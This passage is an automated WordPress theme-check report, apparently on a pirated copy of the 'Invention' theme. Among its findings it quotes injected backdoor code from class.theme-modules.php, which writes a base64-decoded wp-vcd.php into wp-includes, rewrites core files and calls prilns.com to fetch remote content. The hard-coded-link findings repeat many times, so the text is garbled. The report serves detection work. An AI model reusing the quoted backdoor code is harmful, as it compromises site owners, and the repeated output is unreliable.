class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);
  7. Malware : Network operations curl_init was found in the file tmhOAuth.php 635: $c = curl_init();curl_exec was found in the file tmhOAuth.php 703: $response = curl_exec($c);curl_init was found in the file twitteroauth.php 201: $ci = curl_init();curl_exec was found in the file twitteroauth.php 227: $response = curl_exec($ci);
  8. Admin menu : Themes should use add_theme_page() for adding admin pages. File option.php : 121: $hook_suffix = add_menu_page(File option.php : 133: $hook_suffix = add_submenu_page(File functions.interface.php : 59: $of_page = add_menu_page('Jozoor Panel', THEMENAME, 'edit_theme_options', 'optionsfram
  9. Deprecated functions : screen_icon screen_icon found in file class-tgm-plugin-activation.php. Deprecated since version 3.8.391: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );1585: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in loader.php. Themes must not deregister core scripts. 206: wp_deregister_script($name);
  2. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is invention-shared-by-vestathemes-com.
  4. Text domain : Incorrect use of translation functions.Found a translation function that has an incorrect number of arguments. Function __, with the arguments '<div id="j_services_icons_preview" class="j_icons_preview"><ul>', </ul></div>, 'jozoorthemes' in file services.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'You don\'t create sliders yet' in file functions.php.Found a translation function that is missing a text-domain. Function esc_attr__, with the arguments "Submit" in file functions.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are jozoorthemes, vp_textdomain, woothemes, tgmpa, cmb, </ul></div>.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. Unwanted files : hidden file(s) or folder(s).ds_store was found.
  7. Line endings consistency : Both DOS and UNIX style line endingsFound a mix of \r\n and \n line endings in file custom.css.php.Found a mix of \r\n and \n line endings in file wide.css.Found a mix of \r\n and \n line endings in file boxed.css.Found a mix of \r\n and \n line endings in file base.css.Found a mix of \r\n and \n line endings in file javascript.css.Found a mix of \r\n and \n line endings in file font.css.Found a mix of \r\n and \n line endings in file blue.css.Found a mix of \r\n and \n line endings in file green.css.Found a mix of \r\n and \n line endings in file orange.css.Found a mix of \r\n and \n line endings in file turquoise.css.Found a mix of \r\n and \n line endings in file red.css.Found a mix of \r\n and \n line endings in file white.css.Found a mix of \r\n and \n line endings in file dark.css.Found a mix of \r\n and \n line endings in file skeleton.css.Found a mix of \r\n and \n line endings in file style.css.Found a mix of \r\n and \n line endings in file shortcodes.css.Found a mix of \r\n and \n line endings in file rtl.css.
  8. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  9. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  10. Deprecated functions : screen_iconscreen_icon found in file class-tgm-plugin-activation.php. Deprecated since version 3.8.391: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );1585: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );
  11. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  12. I18N implementation : Proper use of ___all(Possible variable $list_of_icons found in translation function in services.php. Translation function calls should not contain PHP variables.
  13. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  14. CSS files : Presence of .bypostauthor class.bypostauthor css class is needed in theme css.
  15. CSS files : Presence of .gallery-caption class.gallery-caption css class is needed in theme css.
  16. Screenshot : Screenshot fileScreenshot size is 388x291px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in header.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.Possible Favicon found in header-shop.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file set.php.93: <p><?php printf(__('This option panel is built using <a href='http://vafpress.com/vafpress-framework'>Vafpress Framework %s</a> powered bPossible hard-coded links were found in the file parser.php.64: 'help' => '<a href='http://daringfireball.net/projects/markdown/syntax'>Markdown syntax</a> allPossible hard-coded links were found in the file flickr-stream.php.89: <small><?php _e('Don't know your ID? Go to ', 'jozoorthemes'); ?><a href='http://idgettr.com' target='_blank'><?php _e('idgettr', 'jozoorthemes'); ?>Possible hard-coded links were found in the file subscribe-form.php.76: <br /><small><?php _e('you can add your ', 'jozoorthemes'); ?><a href='http://mailchimp.com' target='_blank'><?php _e('mailchimp', 'jozoorthemes')77: <a href='http://snippi.com/s/62m3cig' target='_blank'><?php _e('Get Standard Code FoPossible hard-coded links were found in the file latest-tweets.php.231: <a href='https://dev.twitter.com/apps/new' target='_blank'>https://dev.twitter.com/a233: <a href='http://www.youtube.com/watch?v=noB3P-K-wb4' target='_blank'>http://www.youtPossible hard-coded links were found in the file shortcode-generator.php.189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a 